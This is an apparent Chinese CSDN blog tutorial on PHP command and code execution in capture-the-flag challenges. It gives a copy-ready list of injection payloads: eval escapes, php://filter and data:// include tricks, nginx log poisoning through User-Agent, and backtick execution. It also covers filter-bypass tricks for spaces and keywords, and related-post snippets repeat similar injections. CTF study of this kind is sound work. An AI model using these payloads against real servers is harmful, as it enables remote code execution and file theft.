一篇文章带你进阶CTF命令执行

已于 2024-02-13 12:16:53 修改
阅读量2.3k 收藏 37
点赞数 55
分类专栏: PHP特性 命令执行 文章标签: 命令执行进阶 web安全 PHP
于 2023-12-21 22:36:41 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/csjjjd/article/details/135098811
版权
本文详细介绍了PHP编程中常见的安全漏洞,如代码注入利用eval()和文件包含漏洞,伪协议执行,以及如何通过各种技巧如反引号执行shell命令。通过实例演示了如何利用这些技巧绕过过滤和获取flag。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

以下的命令是为了方便以后做题时方便各位读者直接来这里复制使用,刚开始还请先看完这篇文章后才会懂得下面的命令

?c=eval($_GET[shy]);&shy=passthru('cat flag.php');      #逃逸过滤 

?c=include%09$_GET[shy]?>&shy=php://filter/read=convert.base64-encode/resource=flag.php        #文件包含


?c=include$_GET[cmd]?>&cmd=data://text/plan,<?php system("tac flag.php")?>  #文件包含
?c=include$_GET[cmd]>&cmd=data://text/plan;base64;PD9waHAgc3lzdGVtKCJjYXQgZmxhZy5waHAiKTs/Pg==        #文件包含

c=show_source('flag.php');​    #文件读取

?c=data:text/plain; <?php system($_POST[1]);?> POST: 1=tac flag.php   #伪协议

?c=/var/log/nginx/access.log 在 User-Agent插入<?php echo system('ls');?>   #文件日志包含

?c=echo(`tac%09f*`);   #反引号

c=echo file_get_contents('flag.php');     文件读取

                                                                          正文

1.绕过cat使用:

tac more less head tac tail nl od(二进制查看) vi vim sort uniq rev

2.绕过空格用:

%09 <> ${IFS} $IFS$ {cat,fl*} %20

注:

%09  ##(Tab) %20 ##(space)

3.对flag的过滤(这里也就几个,索性就全丢出来了)

1.‘’    (例如fl‘’ag)

2.“”     (例如fl""ag)

3.?       (例如fl??)

4.*          (例如fl*)

既然是进阶,那光讲基础知识那可不行!

1.代码注入攻击(逃逸过滤)

原理就是写入参数,利用它作为中间人逃逸过滤,这是一种危害极大的漏洞

拿一道题举例:

?c=eval($_GET[shy]);&shy=passthru('cat flag.php');

在这段代码中,使用了 PHP 中的 GET 方法来获取参数值。$_GET[shy]代表获取名为"shy"的 GET 参数的值,并将其作为字符串传递给 eval() 函数进行执行。

在这个例子中,如果你通过 URL 的查询参数传递 c=eval($_GET[shy]),那么这个参数会被当做 PHP 代码执行,最终达到逃逸对c的过滤,毕竟那是过滤c的,管我shy什么事!

2.文件包含漏洞

还是上面那道题目

?c=include%09$_GET[shy]?>&shy=php://filter/read=convert.base64-encode/resource=flag.php

 注:分号可以使用>? 代替,而这里又过滤了分号的

$_GET[shy]代表获取名为"shy"的 GET 参数的值,并将其作为字符串传递给 include 函数进行包含。

再通过查询参数传递 c=include%09$_GET[shy]?>,会将 GET 参数 "shy" 的值作为文件包含的路径,并执行该文件的内容。

而通过查询参数传递 shy=php://filter/read=convert.base64-encode/resource=flag.php,则将 php://filter/read=convert.base64-encode/resource=flag.php 作为 GET 参数 "shy" 的值。在这个例子中,php://filter 是 PHP 的过滤器机制,read=convert.base64-encode 表示读取文件并将其内容转换为 Base64 编码,resource=flag.php 表示要读取的文件路径是 flag.php

这段代码的目的是将 flag.php 文件的内容以 Base64 编码的形式返回给用户。

如果不能理解那就强烈推荐一篇文章《一篇文章带你入门文件上传》

一篇文章带你入门文件包含-CSDN博客

ps:如果看到了题目看到了include,就直接使用我的一篇文章带你入门文件包含-CSDN博客的指令,如果没有看到,那就使用我这篇文章上面的指令。

3.伪协议

?c=data:text/plain; <?php system($_POST[1]);?> POST: 1=tac flag.php

这段代码的含义是尝试通过 PHP 的 system 函数执行通过 POST 方法传递的命令,具体命令是反向显示(逐行倒序)flag.php 文件的内容。

还有?c=data:text/plain,<?php system(‘tac f*’);?>本质是一样的

常见命令:

?c=include%0a$_GET[cmd]?>&cmd=php://filter/read=convert.base64-encode/resource=flag.php
?c=include$_GET[cmd]?>&cmd=data://text/plan,<?php system("tac flag.php")?>
?c=include$_GET[cmd]?>&cmd=data://text/plan;base64;PD9waHAgc3lzdGVtKCJjYXQgZmxhZy5waHAiKTs/Pg==

 

4.文件读取:

c=show_source('flag.php');​ 

在 PHP 中,show_source() 是一个内置函数,用于打开并显示指定文件的源代码。该函数接受一个文件名作为参数,并将该文件的内容以文本形式进行输出。

5.文件日志包含

还是拿上面那道题目举例:

在User-Agent插入
<?php echo system('ls');?>(当然换个命令也可以,比如<?php echo system('cat flag.php');?>

?c=/var/log/nginx/access.log

就像这样

文件日志直接给你了,接下来ctrl+f可以直接搜索网页特殊字符,比如flag,接下来网页就会帮你锁定位置,是不是以为flag就直接出来了?当然没有那么简单,哈哈,这次没有flag,不过这条命令一般都是可以执行的,可以看到很多有用信息,有些题目有时甚至flag就直接出来了

6.反引号shell 命令执行

命令执行函数:passthru、shell_exec、exec等 其实这里还可以使用反引号 `

`反引号和shell_exec意思相同在php中称之为执行运算符,PHP 将尝试将反引号中的内容作为 shell 命令来执行,并将其输出信息返回

?c=echo(`tac%09f*`);

真心希望大家在读了我的文章后能够有所获!

CTF从入门到提升(十六)代码执行相关函数及例题分享
anquanniu的博客
09-17 812
代码/命令执行 比如说能够对一个php的站点,控制php代码,那么我们就把它划分为代码执行,如果能执行网站所在服务器中的命令,我们这就把它划分为命令执行,因为它执行的是系统命令。 一般来说代码或命令执行漏洞都存在一个相关函数,通过控制部分参数传递到函数中实现命令执行。说到CTF题型中的这种攻击手段,一定要知道哪些函数能够被利用需要我们去关注的,首先会大家了解一些代码注入的相关函数,例如执行...
联合战队大佬你入门CTF-web(2),Golang之内存泄漏调试学习与总结
2401_84254196的博客
04-20 956
针对以上技术内容,博主会陆续创作技术分享。敬请期待~以上就是F12师傅总结的web入门技巧,在这里贴一下师傅的博客地址感兴趣的师傅可以多多关注,跟着大佬走,flag拿到饱!!!黑客&网络安全如何学习1.学习路线图攻击和防守要学的东西也不少,具体要学的东西我都写在了上面的路线图,如果你能学完它们,你去就业和接私活完全没有问题。2.视频教程网上虽然也有很多的学习资源,但基本上都残缺不全的,这是我自己录的网安视频教程,上面路线图的每一个知识点,我都有配套的视频讲解。
CTF-命令执行
Luodehahajiang的博客
07-03 2506
ctf 命令执行 命令执行函数 命令执行绕过方法
文件包含(CTFshow 刷题记录)持续更新
最新发布
2401_84893440的博客
04-13 2047
Session控制:通过PHPSESSID​指定文件名,注入恶意代码。竞争窗口:在PHP删除前包含文件,需毫秒级并发请求。绕过过滤:直接路径包含,避免使用被过滤字符。
CTFWEB 代码执行&命令执行&CTFSHOW wp
m0_48736242的博客
10-02 2306
CTFWEB 代码执行&命令执行&CTFSHOW wp
CTF|SQL显错注入
算法与编程之美
07-31 418
精选30+云产品,助力企业轻松上云!>>> ...
CTF-命令执行【超详细】
qq_53058639的博客
02-02 779
作者简介:不知名白帽,网络安全学习者。
CTF技能提升:从报错注入到命令执行全方位指南
资源中提到的“CTF从入门到提升”部分,很可能是该压缩包中包含的一篇或多篇指导文章或教程,它们将逐步引导初学者了解和掌握CTF的基础知识,并通过实战演练提升到高级水平。而文件名称列表中的“CTF ├╙╚δ├┼╡...
[CTFSHOW]命令执行
热门推荐
Y4tacker的博客
11-20 1万+
文章目录web 29web 30web 31web32web40参考文章 web 29 <?php error_reporting(0); if(isset($_GET['c'])){ $c = $_GET['c']; if(!preg_match("/flag/i", $c)){ eval($c); } }else{ highlight_file(__FILE__); } 我这里只想到五种简便的方法: 通配符 payload1:c=syst
CTF题型 Python中pickle反序列化进阶利用&amp;例题&amp;opache绕过(2)
2401_84009597的博客
04-20 1026
V操作码是可以识别\u (unicode编码绕过)无R,i,o os 可过 + 关键词过滤。特别是命令有特殊功能字符。无R,i,o os可过。
Ctfer训练计划】——命令执行的解题技巧(持续更新中)
m0_59598029的博客
08-16 852
从时代发展的角度看,网络安全的知识是学不完的,而且以后要学的会更多,同学们要摆正心态,既然选择入门网络安全,就不能仅仅只是入门程度而已,能力越强机会才越多。因为入门学习阶段知识点比较杂,所以我讲得比较笼统,大家如果有不懂的地方可以找我咨询,我保证知无不言言无不尽,需要相关资料也可以找我要,我的网盘里一大堆资料都在吃灰呢。干货主要有:①1000+CTF历届题库(主流和经典的应该都有了)②CTF技术文档(最全中文版)③项目源码(四五十个有趣且经典的练手项目及源码)
命令执行_代码执行
LainWith的博客
08-24 527
目录原理命令执行漏洞原理代码执行漏洞原理命令执行与代码执行漏洞区别命令执行&代码执行漏洞危害脑图OS命令执行windows系统linux系统小结靶机测试安装Example 1Example 2Example 3其他案例过滤空格过滤目录分隔符过滤运算符 原理 更进一步的解释,请参见: MiscSecNotes 命令执行漏洞和代码执行漏洞详解 一文了解命令执行漏洞和代码执行漏洞 命令执行漏洞原理 在操作系统中,“&、|、||”都可以作为命令连接符使用,用户通过浏览器提交执行命令,由于服务器端
PHP代码审计之命令执行
luyaran的博客
01-13 1203
PHP命令注入攻击漏洞是PHP应用程序常见漏洞之一。国内著名的PHP应用程序,如discuz!、dedecms等大型程序在网络中均被公布过存在命令注入攻击漏洞,黑客可以通过命令注入攻击漏洞快速获取网站权限,进而实施挂马、钓鱼等恶意攻击,造成的影响和危害十分巨大。同时,目前PHP语言应用于Web应用程序开发所占比例较大,Web应用程序员应该了解命令注入攻击漏洞的危害. PHP 执行系统命令可以
CTF-命令注入(代码执行漏洞)
su__xiaoyan的博客
01-20 2133
实验环境 攻击机:172.20.10.5 靶机:172.20.10.4 实验流程 端口扫描 端口详细信息探测 命令:nmap -T4 -A -v 靶机IP地址 发现网站下的robots.txt中包含几个敏感目录 web站点详细信息探测 web目录爆破 访问robots.txt,对其中的敏感目录进行查看 其中/nothing为404页面,但是和正常的4014页面不同 查看源代码,发现网站管理员在源代码中存储了常用的密码 其中/tmp和/uploads均为空目录 尝试探测改地址允许使用的请求方法,
一些CTFphp可利用的函数和一些正则表达式的绕过方法
m0_75066605的博客
03-26 2848
整理的一些CTFphp可利用的函数和一些正则表达式的绕过方法
moectf post
weixin_43939887的博客
09-13 247
点击题目提示please post a to the server 根据提示将参数a post到服务器上 需使用get/post模拟请求测试工具https://www.sojson.com/httpRequest/ 发送请求 moectf{P0st_1s_easy_to0} ...
CTF之代码/命令执行
m0_62102520的博客
07-13 401
1.命令执行介绍 2.命令执行原理 3.代码执行介绍
ctf_show笔记篇(web入门---命令执行
whale_waves的博客
03-02 1827
${PWD::${##}}???${PWD::${##}}?${USER:~A}?$IFS????.??? ####我的环境$USER是root,ctfshow的不是所以这里是正常的
ctf 命令执行绕过
01-15
### CTF 比赛中的命令执行绕过技巧 在CTF竞赛中,面对命令执行漏洞时,攻击者常常遇到各种过滤机制。为了成功实施渗透测试并完成挑战,掌握不同的绕过技术至关重要。 #### 使用截断符号 当题目提供了一个可控制的部分作为参数传递给某个系统调用时,可以通过尝试不同类型的截断字符来分割原有逻辑与自定义指令之间的联系[^2]。例如,在允许用户提交IP地址供`ping`使用的场景下: ```bash 127.0.0.1; ls / ``` 这里的分号(`;`)即为一种简单的命令链结束符,使得后续任意合法shell语句得以被执行。 #### 利用环境变量和间接引用 某些情况下直接输入特殊字符可能被严格限制,此时可以考虑借助环境变量或通过其他方式引入恶意负载。比如PHP环境中存在`${}`语法支持动态解析字符串表达式,这便成为了一种潜在的突破口[^4]: ```php ${system('whoami')} ``` 上述代码片段展示了如何利用 `${}` 结构嵌入 `system()` 函数调用来获取当前用户的名称信息。 #### 替代字符集编码 如果目标应用对特定字符进行了黑名单处理,则可通过URL编码、十六进制转义序列等方式改变敏感字符的表现形式而不影响其实际意义。例如将反引号替换为其对应的HTML实体表示法(`)以规避检测: ```html `/bin/cat flag.txt` ``` 此操作最终会被解释器还原成原始形态从而触发预期行为——读取文件内容。 #### 组合多阶段载荷 考虑到单一手段未必能突破所有防护措施,组合运用前述各项策略往往能够提高成功率。先发送看似无害的数据包建立初步交互通道,再逐步注入更复杂的有效载荷直至达成目的。 ---
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值